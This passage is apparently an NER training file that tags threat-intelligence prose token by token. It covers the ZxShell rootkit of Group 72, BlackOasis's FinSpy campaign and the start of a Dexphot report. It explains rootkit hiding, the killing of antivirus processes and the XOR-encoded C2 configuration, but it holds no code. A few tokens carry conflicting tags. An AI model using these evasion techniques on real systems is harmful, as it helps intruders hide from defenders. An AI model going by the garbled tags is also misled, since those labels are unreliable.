+name O
+“ O
+USBHPMS S-FILE
+” O
+. O
+
+Finally O
+the O
+driver O
+is O
+started O
+using O
+the O
+ZwLoadDriver O
+native O
+API O
+. O
+
+The O
+ZxShell S-MAL
+driver O
+starts O
+by O
+acquiring O
+some O
+kernel O
+information O
+and O
+then O
+hooking O
+“ O
+ObReferenceObjectByHandle O
+” O
+API O
+. O
+
+Finally O
+it O
+spawns O
+2 O
+system O
+threads O
+. O
+
+The O
+first O
+thread O
+is O
+the O
+“ O
+communication S-TOOL
+” O
+thread O
+. O
+
+ZxShell S-MAL
+employs O
+a O
+strange O
+method O
+for O
+communication O
+: O
+it O
+hooks O
+the O
+NtWriteFile O
+API O
+and O
+recognizes O
+5 O
+different O
+special O
+handle O
+values O
+as O
+commands O
+: O
+
+0x111111111 O
+: O
+Hide O
+“ O
+Loveusd O
+” O
+driver O
+from O
+the O
+system O
+kernel O
+driver O
+list O
+. O
+0x22222222 O
+: O
+Securely O
+delete O
+an O
+in-use O
+or O
+no-access O
+target O
+file-name O
+. O
+0x44444444 O
+: O
+Unhook O
+the O
+ZwWriteFile O
+API O
+and O
+hook O
+KiFastCallEntry O
+. O
+0x55555555 O
+: O
+Remove O
+the O
+ZxShell S-MAL
+Image O
+Load O
+Notify O
+routine O
+. O
+0x88888888 O
+: O
+Set O
+a O
+special O
+value O
+called O
+“ O
+type O
+” O
+in O
+Windows S-OS
+registry O
+key O
+HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverMain O
+. O
+
+The O
+second O
+Loveusd S-TOOL
+system O
+thread O
+does O
+a O
+lot O
+of O
+things O
+. O
+
+Its O
+principal O
+duties O
+are O
+to O
+create O
+the O
+ZxShell S-MAL
+main O
+DLL S-TOOL
+in O
+“ O
+c:\Windows\System32\commhlp32.dll S-FILE
+” O
+and O
+to O
+install O
+the O
+Kernel O
+“ O
+Load B-TOOL
+Image I-TOOL
+Notify I-TOOL
+routine E-TOOL
+” O
+. O
+
+The O
+code O
+then O
+tries O
+to O
+kill O
+each O
+process O
+and O
+service O
+that O
+belongs O
+to O
+the O
+following O
+list O
+of O
+AV O
+products O
+: O
+Symantec B-TOOL S-IDTY I-TOOL
+Firewall E-TOOL
+Norton S-TOOL
+ESET S-TOOL
+McAfee S-TOOL
+Avast S-TOOL
+Avira S-TOOL
+Sophos S-TOOL
+Malwarebytes S-TOOL
+. O
+
+Next O
+, O
+the O
+ZxShell S-MAL
+Load-Image O
+Notify O
+function O
+prevents O
+the O
+AV O
+processes O
+from O
+restarting O
+. O
+
+The O
+installation O
+procedure O
+continues O
+in O
+the O
+user-mode O
+dropper O
+. O
+
+The O
+ZxShell S-MAL
+service O
+is O
+installed O
+as O
+usual O
+, O
+and O
+the O
+in-execution O
+dropper O
+is O
+deleted O
+permanently O
+using O
+the O
+special O
+handle O
+value O
+0x22222222 O
+for O
+the O
+WriteFile O
+API O
+call O
+. O
+
+This O
+handle O
+value O
+is O
+invalid O
+: O
+all O
+the O
+windows S-OS
+kernel O
+handle O
+values O
+are O
+by O
+design O
+a O
+multiple O
+of O
+4 O
+. O
+
+The O
+ZxShell S-MAL
+hook O
+code O
+knows O
+that O
+and O
+intercept O
+it O
+. O
+
+ObReferenceObjectByHandle O
+is O
+a O
+Kernel O
+routine O
+designed O
+to O
+validate O
+a O
+target O
+object O
+and O
+return O
+the O
+pointer O
+to O
+its O
+object O
+body O
+( O
+and O
+even O
+its O
+handle O
+information O
+) O
+, O
+starting O
+from O
+the O
+object O
+handle O
+( O
+even O
+the O
+user-mode O
+one O
+) O
+. O
+
+The O
+hook O
+installed O
+by O
+ZxShell S-MAL
+implements O
+one O
+of O
+its O
+filtering O
+routine O
+. O
+
+It O
+filters O
+each O
+attempt O
+to O
+open O
+the O
+ZxShell S-MAL
+protected O
+driver O
+or O
+the O
+main O
+DLL S-TOOL
+, O
+returning O
+a O
+reference O
+to O
+the O
+“ O
+netstat.exe S-FILE
+” O
+file O
+. O
+
+The O
+protection O
+is O
+enabled O
+to O
+all O
+processes O
+except O
+for O
+ones O
+in O
+the O
+following O
+list O
+: O
+Svchost.exe S-FILE
+, O
+Lsass.exe S-FILE
+, O
+Winlogon.exe S-FILE
+, O
+Services.exe S-FILE
+, O
+Csrss.exe S-FILE
+, O
+ctfmon.exe S-FILE
+, O
+Rundll32.exe S-FILE
+, O
+mpnotify.exe S-FILE
+, O
+update.exe S-FILE
+. O
+
+If O
+the O
+type O
+of O
+the O
+object O
+that O
+the O
+system O
+is O
+trying O
+to O
+validate O
+is O
+a O
+process O
+, O
+the O
+hook O
+code O
+rewrites O
+again O
+the O
+configuration O
+data O
+of O
+the O
+ZxShell S-MAL
+service O
+in O
+the O
+windows S-OS
+registry O
+. O
+
+The O
+last O
+type O
+of O
+Kernel O
+modification O
+that O
+ZxShell S-MAL
+rootkit O
+performs O
+is O
+the O
+system O
+call O
+dispatcher O
+( O
+KiFastCallEntry O
+) O
+hook O
+. O
+
+In O
+this O
+manner O
+, O
+ZxShell S-MAL
+is O
+able O
+to O
+completely O
+hide O
+itself O
+, O
+intercepting O
+the O
+following O
+Kernel O
+API O
+calls O
+: O
+ZwAllocateVirtualMemory O
+, O
+ZwOpenEvent O
+, O
+ZwQueryDirectoryFile O
+, O
+ZwWriteFile O
+, O
+ZwEnumerateKey O
+, O
+and O
+ZwDeviceIoControlFile O
+. O
+
+Command B-TOOL
+and I-TOOL
+Control E-TOOL
+Server O
+: O
+Sample O
+( O
+SHA256 S-ENCR
+: O
+1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2
+) O
+is O
+configured O
+to O
+act O
+as O
+a O
+server O
+. O
+
+The O
+symbol O
+“ O
+g_bCreateListenSck O
+” O
+is O
+set O
+to O
+1 O
+. O
+
+This O
+means O
+that O
+, O
+as O
+seen O
+above O
+, O
+the O
+ZxShell S-MAL
+Dll S-TOOL
+is O
+started O
+in O
+listening O
+mode O
+. O
+
+It O
+connects O
+to O
+the O
+first O
+remote O
+C&C S-TOOL
+that O
+tries O
+to O
+contact O
+it O
+and O
+succeeds O
+in O
+the O
+handshake O
+. O
+
+The O
+encrypted O
+IP O
+address O
+is O
+“ O
+127.0.0.2 S-IP
+” O
+( O
+used O
+as O
+loopback O
+) O
+and O
+no O
+connection O
+is O
+made O
+on O
+that O
+IP O
+address O
+( O
+due O
+to O
+the O
+listening O
+variable O
+set O
+to O
+1 O
+) O
+. O
+
+We O
+used O
+the O
+ZxShell S-MAL
+package O
+for O
+version O
+3.10 O
+( O
+SHA256 S-ENCR
+: O
+1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 S-SHA2
+).The O
+convenient O
+thing O
+about O
+this O
+is O
+that O
+the O
+CNC B-TOOL
+panel E-TOOL
+worked O
+with O
+any O
+version O
+, O
+3.10 O
+and O
+above O
+. O
+
+The O
+buttons O
+are O
+all O
+in O
+Chinese O
+, O
+with O
+the O
+help O
+of O
+Google B-TOOL
+Translate E-TOOL
+and O
+keen O
+detective O
+skills O
+( O
+read O
+: O
+button O
+clicking O
+) O
+, O
+we O
+’ve O
+deciphered O
+the O
+functionality O
+. O
+
+Once O
+an O
+infected O
+machine O
+connects O
+, O
+you O
+see O
+its O
+information O
+displayed O
+in O
+a O
+selection O
+box O
+at O
+the O
+top O
+. O
+
+There O
+are O
+some O
+built O
+in O
+functions O
+on O
+the O
+side O
+for O
+the O
+more O
+common O
+features O
+. O
+
+These O
+include O
+remote O
+desktop O
+, O
+webcam O
+spying O
+, O
+remote O
+shell O
+, O
+and O
+file O
+management O
+. O
+
+You O
+can O
+also O
+select O
+a O
+host O
+and O
+type O
+help O
+for O
+a O
+full O
+list O
+of O
+commands O
+. O
+
+I O
+have O
+the O
+same O
+machine O
+infected O
+with O
+two O
+different O
+version O
+of O
+ZxShell S-MAL
+. O
+
+Sending O
+the O
+help O
+command O
+for O
+each O
+, O
+you O
+can O
+see O
+the O
+extra O
+features O
+added O
+between O
+version O
+3.1 O
+and O
+3.2 O
+. O
+
+Keylogging S-ACT
+, O
+ZXARPS S-MAL
+( O
+IP O
+and O
+URL O
+spoofing O
+) O
+, O
+and O
+SYNFlood S-ACT
+are O
+some O
+of O
+the O
+interesting O
+features O
+added O
+to O
+version O
+3.2 O
+. O
+
+In O
+versions O
+3.1 O
+– O
+3.21, O
+the O
+configuration O
+info O
+is O
+xor S-ENCR
+encoded O
+with O
+0x85 O
+. O
+
+This O
+configuration O
+info O
+can O
+be O
+changed O
+with O
+a O
+tool O
+included O
+in O
+the O
+ZxShell S-MAL
+package O
+. O
+
+In O
+versions O
+3.22 O
+and O
+3.39 O
+the O
+routine O
+changes O
+. O
+
+The O
+new O
+xor S-ENCR
+encoding O
+byte O
+is O
+0x5B O
+. O
+
+The O
+data O
+is O
+stored O
+in O
+the O
+last O
+0x100 O
+bytes O
+of O
+the O
+file O
+. O
+
+The O
+first O
+8 O
+bytes O
+of O
+data O
+are O
+static O
+. O
+
+Then O
+there O
+is O
+the O
+dll S-TOOL
+install O
+name O
+, O
+the O
+domain O
+, O
+and O
+the O
+port O
+. O
+
+Knowing O
+the O
+obfuscation O
+routines O
+for O
+this O
+data O
+we O
+wrote O
+a O
+script O
+to O
+extract O
+the O
+URLs O
+/ O
+IPs O
+and O
+ports O
+stored O
+. O
+
+The O
+most O
+common O
+ports O
+used O
+are O
+, O
+80, O
+1985, O
+1986, O
+and O
+443 O
+. O
+1985 O
+is O
+the O
+default O
+port O
+for O
+the O
+malware O
+, O
+1986 O
+is O
+the O
+lazy O
+variation O
+of O
+that O
+port O
+. O
+
+Port O
+80 O
+and O
+443 O
+are O
+the O
+default O
+ports O
+for O
+HTTP S-PROT
+and O
+HTTPS S-PROT
+traffic O
+. O
+
+The O
+next O
+most O
+common O
+is O
+port O
+53 O
+. O
+
+This O
+is O
+used O
+in O
+some O
+of O
+the O
+newer O
+3.22 O
+and O
+3.39 O
+samples O
+. O
+
+After O
+that O
+, O
+the O
+count O
+for O
+each O
+port O
+starts O
+declining O
+sharply O
+. O
+
+The O
+choices O
+are O
+interesting O
+though O
+, O
+many O
+correspond O
+to O
+what O
+looks O
+like O
+the O
+birth O
+year O
+of O
+the O
+controller O
+( O
+ie O
+. O
+years O
+in O
+the O
+late O
+1980s S-TIME
+and O
+early O
+1990s S-TIME
+) O
+, O
+and O
+others O
+seem O
+to O
+match O
+what O
+year O
+the O
+malware O
+was O
+launched O
+in O
+( O
+ie O
+. O
+in O
+the O
+2000s S-TIME
+, O
+relatively O
+close O
+to O
+the O
+current O
+year O
+) O
+. O
+
+Since O
+this O
+malware O
+dates O
+back O
+to O
+around O
+2004 S-TIME
+, O
+there O
+are O
+many O
+samples O
+containing O
+CNC S-TOOL
+URLs O
+from O
+the O
+3322.org S-URL
+page O
+. O
+
+This O
+page O
+used O
+to O
+offer O
+no-ip O
+type O
+hosting O
+and O
+was O
+widely O
+used O
+by O
+malware O
+authors O
+. O
+
+So O
+much O
+so O
+that O
+Microsoft S-IDTY
+did O
+a O
+takedown O
+in O
+2012 S-TIME
+. O
+
+A O
+similar O
+service O
+, O
+vicp.net S-URL
+, O
+is O
+also O
+seen O
+in O
+many O
+of O
+the O
+domains O
+. O
+
+In O
+the O
+malware O
+, O
+if O
+a O
+domain O
+is O
+configured O
+, O
+it O
+will O
+retrieve O
+domain.tld S-FILE
+/ O
+myIP
+. O
+
+txt S-FILE
+. O
+
+This O
+file O
+contains O
+a O
+list O
+of O
+IP O
+addresses O
+for O
+the O
+infected O
+machine O
+to O
+connect O
+back O
+to O
+. O
+
+Otherwise O
+, O
+if O
+an O
+IP O
+address O
+is O
+configured O
+, O
+it O
+will O
+connect O
+directly O
+to O
+that O
+IP O
+address O
+. O
+
+We O
+have O
+written O
+a O
+simple O
+C++ O
+ZxShell S-MAL
+Server O
+that O
+implements O
+the O
+communication O
+and O
+the O
+handshake O
+for O
+the O
+version O
+3.10 O
+and O
+3.20 O
+of O
+the O
+ZxShell S-MAL
+DLL S-TOOL
+. O
+
+The O
+implementation O
+is O
+quite O
+simple O
+: O
+After O
+the O
+handshake O
+, O
+2 O
+threads O
+that O
+deal O
+with O
+data O
+transfer O
+are O
+spawned O
+. O
+
+Advanced O
+persistent O
+threats O
+will O
+remain O
+a O
+problem O
+for O
+companies O
+and O
+organizations O
+of O
+all O
+sizes O
+, O
+especially O
+those O
+with O
+high O
+financial O
+or O
+intellectual O
+property O
+value O
+. O
+
+Group B-APT
+72 E-APT
+’s O
+involvement O
+in O
+Operation B-ACT
+SMN E-ACT
+is O
+another O
+example O
+of O
+what O
+sort O
+of O
+damage O
+that O
+can O
+be O
+done O
+if O
+organizations O
+are O
+not O
+diligent O
+in O
+their O
+efforts O
+to O
+secure O
+their O
+networks O
+. O
+
+ZxShell S-MAL
+is O
+one O
+sample O
+amongst O
+several O
+tools O
+that O
+Group B-APT
+72 E-APT
+used O
+within O
+their O
+campaign O
+. O
+
+ZxShell S-MAL
+is O
+a O
+sophisticated O
+tool O
+employed O
+by O
+Group B-APT
+72 E-APT
+that O
+contains O
+all O
+kinds O
+of O
+functionality O
+. O
+
+Its O
+detection O
+and O
+removal O
+can O
+be O
+difficult O
+due O
+to O
+the O
+various O
+techniques O
+used O
+to O
+conceal O
+its O
+presence O
+, O
+such O
+as O
+disabling O
+the O
+host O
+anti-virus O
+, O
+masking O
+its O
+installation O
+on O
+a O
+system O
+with O
+a O
+valid O
+service O
+name O
+, O
+and O
+by O
+masking O
+outbound O
+traffic O
+as O
+originating O
+from O
+a O
+web O
+browser O
+. O
+
+While O
+other O
+techniques O
+are O
+also O
+utilized O
+to O
+conceal O
+and O
+inhibit O
+its O
+removal O
+, O
+ZxShell S-MAL
+’s O
+primary O
+functionality O
+is O
+to O
+act O
+as O
+a O
+Remote B-TOOL
+Administration I-TOOL
+Tool E-TOOL
+( O
+RAT S-TOOL
+) O
+, O
+allowing O
+the O
+threat O
+actor O
+to O
+have O
+continuous O
+backdoor S-MAL
+access O
+on O
+to O
+the O
+compromised O
+machine O
+. O
+
+As O
+our O
+analysis O
+demonstrates O
+, O
+ZxShell S-MAL
+is O
+an O
+effective O
+tool O
+that O
+can O
+be O
+ultimately O
+used O
+to O
+steal O
+user O
+credentials O
+and O
+other O
+highly O
+valuable O
+information O
+. O
+
+The O
+threat O
+posed O
+by O
+ZxShell S-MAL
+to O
+organizations O
+is O
+one O
+that O
+cannot O
+be O
+ignored O
+. O
+
+Organizations O
+with O
+high O
+financial O
+or O
+intellectual O
+property O
+value O
+should O
+take O
+the O
+time O
+to O
+ensure O
+their O
+security O
+requirements O
+are O
+met O
+and O
+that O
+employee O
+’s O
+are O
+educated O
+about O
+the O
+security O
+threats O
+their O
+organizations O
+face O
+. O
+
+
+Threat O
+Spotlight O
+: O
+Group B-APT
+72 E-APT
+, O
+Opening O
+the O
+ZxShell S-MAL
+. O
+
+A O
+well-funded O
+, O
+highly O
+active O
+group O
+of O
+Middle O
+Eastern O
+hackers O
+was O
+caught O
+, O
+yet O
+again O
+, O
+using O
+a O
+lucrative O
+zero-day S-VULNAME
+exploit O
+in O
+the O
+wild O
+to O
+break O
+into O
+computers O
+and O
+infect O
+them O
+with O
+powerful O
+spyware S-MAL
+developed O
+by O
+an O
+infamous O
+cyberweapons O
+dealer O
+named O
+Gamma B-APT
+Group E-APT
+. O
+
+The O
+incident O
+, O
+as O
+described O
+by O
+security O
+researchers O
+with O
+Moscow-based O
+cybersecurity O
+firm O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+, O
+shines O
+a O
+rare O
+light O
+on O
+the O
+opaque O
+although O
+apparently O
+vibrant O
+market O
+for O
+software O
+exploits O
+and O
+spyware S-MAL
+, O
+which O
+in O
+this O
+case O
+appears O
+to O
+have O
+been O
+purchased O
+by O
+a O
+nation-state O
+. O
+
+The O
+Middle O
+Eastern O
+hacker O
+group O
+in O
+this O
+case O
+is O
+codenamed O
+“ O
+BlackOasis S-APT
+. O
+” O
+Kaspersky S-SECTEAM
+found O
+the O
+group O
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+“ O
+FinSpy S-MAL
+” O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday S-TIME
+. O
+
+Adobe S-IDTY
+issued O
+a O
+fix O
+Monday S-TIME
+to O
+its O
+users O
+in O
+the O
+form O
+of O
+a O
+software O
+update O
+. O
+
+FinSpy S-MAL
+, O
+a O
+final-stage O
+payload O
+that O
+allows O
+for O
+an O
+attacker O
+to O
+covertly O
+learn O
+what O
+a O
+target O
+is O
+talking O
+about O
+and O
+who O
+they O
+are O
+communicating O
+with O
+, O
+is O
+associated O
+with O
+Gamma B-APT
+Group E-APT
+— O
+which O
+goes O
+by O
+other O
+names O
+, O
+including O
+FinFisher S-APT
+and O
+Lench B-APT
+IT I-APT
+Solutions E-APT
+. O
+
+BlackOasis S-APT
+in O
+recent O
+months O
+sent O
+a O
+wave O
+of O
+phishing S-ACT
+emails S-TOOL
+. O
+
+These O
+emails S-TOOL
+contained O
+malicious O
+Microsoft B-TOOL
+Word I-TOOL
+documents E-TOOL
+with O
+the O
+aforementioned O
+Flash B-VULNAME
+Player I-VULNAME
+zero-day E-VULNAME
+hidden O
+inside O
+an O
+embedded O
+ActiveX B-TOOL
+object E-TOOL
+. O
+
+In O
+the O
+past O
+, O
+BlackOasis S-APT
+messages O
+were O
+designed O
+to O
+appear O
+like O
+news O
+articles O
+from O
+2016 S-TIME
+about O
+political O
+relations O
+between O
+Angola S-LOC
+and O
+China S-LOC
+. O
+
+The O
+term O
+zero-day S-VULNAME
+is O
+indicative O
+of O
+a O
+software O
+flaw O
+that O
+remains O
+unknown O
+to O
+the O
+software O
+’s O
+creator O
+. O
+
+Zero-days S-VULNAME
+can O
+be O
+highly O
+disruptive O
+because O
+they O
+provide O
+a O
+window O
+of O
+time O
+for O
+an O
+attacker O
+to O
+breach O
+victims O
+before O
+the O
+vendor O
+is O
+able O
+to O
+apply O
+a O
+software O
+update O
+to O
+address O
+the O
+specific O
+security O
+hole O
+. O
+
+U.S S-LOC
+. O
+cybersecurity O
+firm O
+FireEye S-IDTY
+also O
+recently O
+captured O
+BlackOasis S-APT
+activity O
+as O
+part O
+of O
+a O
+similar O
+incident O
+where O
+the O
+group O
+relied O
+on O
+a O
+different O
+zero-day S-VULNAME
+exploit O
+— O
+more O
+specifically O
+, O
+a O
+SOAP B-TOOL
+WSDL I-TOOL B-VULNAME
+parser I-VULNAME E-TOOL I-VULNAME
+code I-VULNAME
+injection E-VULNAME
+vulnerability O
+— O
+to O
+install O
+FinSpy S-MAL
+onto O
+a O
+small O
+number O
+of O
+devices O
+. O
+
+Again O
+, O
+the O
+attacker O
+’s O
+intention O
+appeared O
+to O
+be O
+espionage O
+. O
+“ O
+Unlike O
+other O
+FinFisher S-APT
+customers O
+or O
+users O
+who O
+focus O
+mostly O
+on O
+domestic O
+operations O
+, O
+BlackOasis S-APT
+focuses O
+on O
+external O
+operations O
+and O
+go O
+after O
+a O
+wide O
+range O
+of O
+targets O
+around O
+the O
+world O
+, O
+” O
+explained O
+Costin O
+Raiu O
+, O
+director O
+of O
+the O
+global O
+research O
+and O
+analysis O
+team O
+at O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+. O
+
+Gamma B-APT
+Group E-APT
+has O
+been O
+accused O
+of O
+selling O
+its O
+products O
+to O
+authoritarian O
+regimes O
+that O
+can O
+use O
+the O
+technology O
+to O
+both O
+track O
+dissidents O
+and O
+conduct O
+foreign O
+espionage O
+over O
+the O
+internet O
+. O
+
+The O
+discovery O
+by O
+Kaspersky S-SECTEAM
+marks O
+at O
+least O
+the O
+fifth O
+zero-day S-VULNAME
+exploit O
+used O
+by O
+BlackOasis S-APT
+and O
+exposed O
+by O
+security O
+researchers O
+since O
+June B-TIME
+2015 E-TIME
+. O
+
+It O
+’s O
+unclear O
+whether O
+the O
+hackers O
+are O
+purchasing O
+the O
+exploits O
+and O
+spyware S-MAL
+together O
+, O
+directly O
+from O
+Gamma B-APT
+Group E-APT
+, O
+or O
+if O
+they O
+were O
+able O
+to O
+acquire O
+some O
+of O
+the O
+tools O
+through O
+other O
+avenues O
+. O
+“ O
+BlackOasis S-APT
+’ O
+interests O
+span O
+a O
+wide O
+gamut O
+of O
+figures O
+involved O
+in O
+Middle O
+Eastern O
+politics O
+and O
+verticals O
+disproportionately O
+relevant O
+to O
+the O
+region O
+. O
+
+This O
+includes O
+prominent O
+figures O
+in O
+the O
+United B-LOC
+Nations E-LOC
+, O
+opposition O
+bloggers O
+and O
+activists O
+, O
+and O
+regional O
+news O
+correspondents O
+, O
+” O
+a O
+blogpost O
+about O
+Kaspersky S-SECTEAM
+’s O
+findings O
+reads O
+. O
+
+The O
+post O
+continues O
+, O
+“ O
+during O
+2016 S-TIME
+, O
+we O
+observed O
+a O
+heavy O
+interest O
+in O
+Angola S-LOC
+, O
+exemplified O
+by O
+lure O
+documents O
+indicating O
+targets O
+with O
+suspected O
+ties O
+to O
+oil O
+, O
+money O
+laundering O
+, O
+and O
+other O
+illicit O
+activities O
+. O
+
+There O
+is O
+also O
+an O
+interest O
+in O
+international O
+activists O
+and O
+think O
+tanks O
+… O
+Victims O
+of O
+BlackOasis S-APT
+have O
+been O
+observed O
+in O
+the O
+following O
+countries O
+: O
+Russia S-LOC
+, O
+Iraq S-LOC
+, O
+Afghanistan S-LOC
+, O
+Nigeria S-LOC
+, O
+Libya S-LOC
+, O
+Jordan S-LOC
+, O
+Tunisia S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+Iran S-LOC
+, O
+Netherlands S-LOC
+, O
+Bahrain S-LOC
+, O
+United B-LOC
+Kingdom E-LOC
+and O
+Angola S-LOC
+. O
+” O
+
+Intent O
+was O
+clearly O
+espionage O
+in O
+many O
+cases O
+, O
+going O
+outside O
+of O
+that O
+"lawful O
+surveillance" O
+boundary.— O
+Brian O
+Bartholomew O
+( O
+@Mao_Ware O
+) O
+October B-TIME
+16, I-TIME
+2017 E-TIME
+Brian O
+Bartholomew O
+, O
+a O
+senior O
+security O
+researcher O
+with O
+Kaspersky S-SECTEAM
+, O
+said O
+on O
+Twitter S-TOOL
+that O
+BlackOasis S-APT
+’ O
+espionage O
+included O
+non-traditional O
+targets O
+— O
+“ O
+going O
+outside O
+of O
+that O
+lawful O
+surveillance O
+boundary. O
+” O
+
+An O
+advanced O
+persistent O
+threat O
+group O
+, O
+previously O
+identified O
+by O
+Microsoft S-IDTY
+and O
+codenamed O
+Neodymium S-APT
+, O
+is O
+closely O
+associated O
+with O
+BlackOasis S-APT
+’ O
+operations O
+. O
+
+Last O
+year O
+, O
+Microsoft S-IDTY
+researchers O
+described O
+Neodymium S-APT
+’s O
+behavior O
+as O
+unusual O
+: O
+“ O
+unlike O
+many O
+activity O
+groups O
+, O
+which O
+typically O
+gather O
+information O
+for O
+monetary O
+gain O
+or O
+economic O
+espionage O
+, O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+appear O
+to O
+launch O
+campaigns O
+simply O
+to O
+gather O
+information O
+about O
+certain O
+individuals O
+. O
+
+These O
+activity O
+groups O
+are O
+also O
+unusual O
+in O
+that O
+they O
+use O
+the O
+same O
+zero-day S-VULNAME
+exploit O
+to O
+launch O
+attacks O
+at O
+around O
+the O
+same O
+time O
+in O
+the O
+same O
+region O
+. O
+
+Their O
+targets O
+, O
+however O
+, O
+appear O
+to O
+be O
+individuals O
+that O
+do O
+not O
+share O
+common O
+affiliations. O
+” O
+
+A O
+cursory O
+review O
+of O
+BlackOasis S-APT
+’ O
+espionage O
+campaign O
+suggests O
+there O
+is O
+some O
+overlap O
+between O
+the O
+group O
+’s O
+actions O
+and O
+Saudi B-LOC
+Arabia E-LOC
+’s O
+geopolitical O
+interests O
+. O
+
+For O
+example O
+, O
+the O
+targeting O
+of O
+Angolan B-IDTY
+organizations E-IDTY
+in O
+mid-2016 S-TIME
+coincidences O
+directly O
+with O
+the O
+rise O
+of O
+Angola S-LOC
+’s O
+oil O
+business O
+with O
+China S-LOC
+, O
+which O
+displaced O
+Saudi B-LOC
+Arabia E-LOC
+as O
+the O
+number O
+one O
+exporter O
+of O
+crude O
+oil O
+to O
+China S-LOC
+at O
+the O
+time O
+. O
+
+All O
+13 O
+countries O
+where O
+Kaspersky S-SECTEAM
+reportedly O
+observed O
+BlackOasis S-APT
+activity O
+are O
+connected O
+to O
+Saudi B-LOC
+Arabia E-LOC
+in O
+one O
+of O
+three O
+ways O
+: O
+economically O
+; O
+from O
+a O
+national O
+security O
+perspective O
+; O
+or O
+due O
+to O
+established O
+policy O
+agreements O
+. O
+
+In O
+addition O
+, O
+Saudi B-LOC
+Arabia E-LOC
+is O
+a O
+known O
+customer O
+of O
+spyware S-MAL
+and O
+has O
+used O
+the O
+technology O
+domestically O
+, O
+according O
+to O
+Citizen B-SECTEAM
+Lab E-SECTEAM
+, O
+a O
+cybersecurity O
+and O
+human-rights O
+focused O
+research O
+laboratory O
+. O
+
+Kaspersky S-SECTEAM
+’s O
+research O
+notes O
+that O
+BlackOasis S-APT
+hacked O
+into O
+computers O
+based O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+
+Insights O
+from O
+one O
+year O
+of O
+tracking O
+a O
+polymorphic O
+threat O
+. O
+
+A O
+little O
+over O
+a O
+year O
+ago O
+, O
+in O
+October B-TIME
+2018 E-TIME
+, O
+our O
+polymorphic O
+outbreak O
+monitoring O
+system O
+detected O
+a O
+large O
+surge O
+in O
+reports O
+, O
+indicating O
+that O
+a O
+large-scale O
+campaign O
+was O
+unfolding O
+. O
+
+We O
+observed O
+as O
+the O
+new O
+threat O
+attempted O
+to O
+deploy O
+files O
+that O
+changed O
+every O
+20-30 O
+minutes O
+on O
+thousands O
+of O
+devices O
+. O
+
+We O
+gave O
+the O
+threat O
+the O
+name O
+“ O
+Dexphot S-MAL
+, O
+” O
+based O
+on O
+certain O
+characteristics O
+of O
+the O
+malware O
+code O
+. O
+
+The O
+Dexphot S-MAL
+attack O
+used O
+a O
+variety O
+of O
+sophisticated O
+methods O
+to O
+evade O
+security O
+solutions O
+. O
+
+Layers O
+of O
+obfuscation O
+, O
+encryption O
+, O
+and O
+the O
+use O
+of O
+randomized O
+file O
+names O
+hid O
+the O
+installation O
+process O
+. O
+
+Dexphot S-MAL
+then O
+used O
+fileless O
+techniques O
+to O
+run O
+malicious O
+code O
+directly O
+in O
+memory O
+, O
+leaving O
+only O
+a O
+few O
+traces O
+that O
+can O
+be O
+used O
+for O
+forensics O
+. O
+
+It O
+hijacked O
+legitimate O
+system O
+processes O
+to O
+disguise O
+malicious O
+activity O
+. O
+
+If O
+not O
+stopped O
+, O
+Dexphot S-MAL
+ultimately O
+ran B-ACT
+a I-ACT
+cryptocurrency I-ACT
+miner I-ACT
+on I-ACT
+the I-ACT
+device E-ACT
+, O
+with O
+monitoring O
+services O
+and O
+scheduled O
+tasks O
+triggering O
+re-infection O
+when O
+defenders O
+attempt O
+to O
+remove O
+the O
+malware O
+. O
+
+In O
+the O
+months O
+that O
+followed O
+, O
+we O
+closely O
+tracked O
+the O
+threat O
+and O
+witnessed O
+the O
+attackers O
+upgrade O
+the O
+malware O
+, O
+target O
+new O
+processes O
+, O
+and O
+work O
+around O
+defensive O
+measures O
+. O
+
+While O
+Microsoft B-TOOL
+Defender I-TOOL
+Advanced I-TOOL
+Threat I-TOOL
+Protection E-TOOL
+’s O
+pre-execution O
+detection O
+engines O
+blocked O
+Dexphot S-MAL
+in O
+most O
+cases O
+, O
+behavior-based O
+machine O
+learning O
+models O
+provided O
+protection O
+for O
+cases O
+where O
+the O
+threat O
+slipped O
+through O
+. O
+
+Given O
+the O
+threat O
+’s O
+persistence O
+mechanisms O
+, O
+polymorphism O
+, O
+and O
+use O
+of O
+fileless O
+techniques O
+, O
+behavior-based O
+detection O
+was O
+a O
+critical O
+component O
+of O
+the O
+comprehensive O
+protection O
+against O
+this O
+malware O
+and O
+other O
+threats O
+that O
+exhibit O
+similar O
+malicious O
+behaviors O
+. O
+
+Microsoft B-TOOL
+Defender E-TOOL
+ATP O
+data O
+shows O
+the O
+effectiveness O
+of O
+behavioral O
+blocking O
+and O
+containment O
+capabilities O
+in O
+stopping O
+the O
+Dexphot S-MAL
+campaign O
+. O
+
+Over O
+time O
+, O
+Dexphot-related O
+malicious O
+behavior O
+reports O
+dropped O
+to O
+a O
+low O
+hum O
+, O
+as O
+the O
+threat O
+lost O
+steam O
+. O
+
+Our O
+close O
+monitoring O
+of O
+Dexphot S-MAL
+helped O
+us O
+ensure O
+that O
+our O
+customers O
+were O
+protected O
+from O
+the O
+evolving O
+threat O
+. O
+
+More O
+importantly O
+, O
+one O
+year O
+’s O
+worth O
+of O
+intelligence O
+helped O
+us O
+gain O
+insight O
+not O
+only O
+into O
+the O
+goals O
+and O
+motivations O
+of O
+Dexphot S-MAL
+’s O
+authors O
+, O
+but O
+of O
+cybercriminals O
+in O
+general O
+. O
+
+The O
+early O
+stages O
+of O
+a O
+Dexphot S-MAL
+infection O
+involves O
+numerous O
+files O
+and O
+processes O
+. O
+
+During O
+the O
+execution O
+stage O
+, O
+Dexphot O
+writes O
+five O
+key O
+files O
+to O
+disk O
+: O
+
+1 O
+、An O
+installer O
+with O
+two O
+URLs O
+; O
+
+2 O
+、An O
+MSI S-TOOL
+package O
+file O
+downloaded O
+from O
+one O
+of O
+the O
+URLs O
+; O
+
+3 O
+、A O
+password-protected O
+ZIP O
+archive O
